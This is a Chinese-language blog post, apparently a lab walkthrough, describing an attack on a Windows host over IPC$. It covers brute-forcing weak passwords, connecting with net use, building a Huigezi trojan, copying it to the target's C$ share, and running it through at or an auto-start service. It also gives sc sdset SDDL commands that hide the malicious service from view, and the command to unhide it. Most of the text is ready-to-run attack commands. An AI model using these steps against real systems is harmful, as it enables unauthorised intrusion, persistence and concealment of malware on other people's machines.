IPC远程命令
我们首先来扫描目标主机是否存在IPC弱口令(PS:废话,靶机肯定存在了)
命令行下ping靶机IP:10.1.1.2,确认靶机存在。
爆破成功后,与目标主机建立IPC net use \\攻击方IP\ipc$ 密码 /user:用户名 用户名密码就是上面暴力破解的。
下一步:制作木马
使用:灰鸽子制作木马,将木马生成在D盘。
下一步:植入木马到目标主机
copy d:server.exe \被攻击方IP\c$\ 建议拷到对方C盘,成功率100%
设置目标主机运行木马(再目标主机中添加计划)
net time \10.1.1.2
at \10.1.1.2 17:17 c:\server.exe
或者通过服务运行
sc create SVNService(服务名) binpath= “J:\Subversion\bin\svnserve.exe(server程序路径) —service -r J:\SVNRep(仓库路径)” start= auto(启动方式) depend= Tcpip(协议)
sc create mrxn binPath=C:/Users/mrxn.net/Desktop/secvery.exe start=auto
& $env:SystemRoot\System32\sc.exe sdset mrxn "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
运行成功后,在我们的任务管理器里面就看不到创建的 secvery 服务了(需要重启任务管理器或者你命令刷新)
如果你不想隐藏此windows服务了,运行以下安全描述符定义语言(SDDL)命令来取消隐藏即可:
& $env:SystemRoot\System32\sc.exe sdset mrxn "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
版权声明:
作者:ForDream
链接:https://ishoud.com/index.php/2022/12/27/11563.html
来源:工具人
文章版权归作者所有,未经允许请勿转载。
THE END
0
二维码
海报
IPC远程命令
我们首先来扫描目标主机是否存在IPC弱口令(PS:废话,靶机肯定存在了)
命令行下ping靶机IP:10.1.1.2,确认靶机存在。
爆破成功后,与……

共有 0 条评论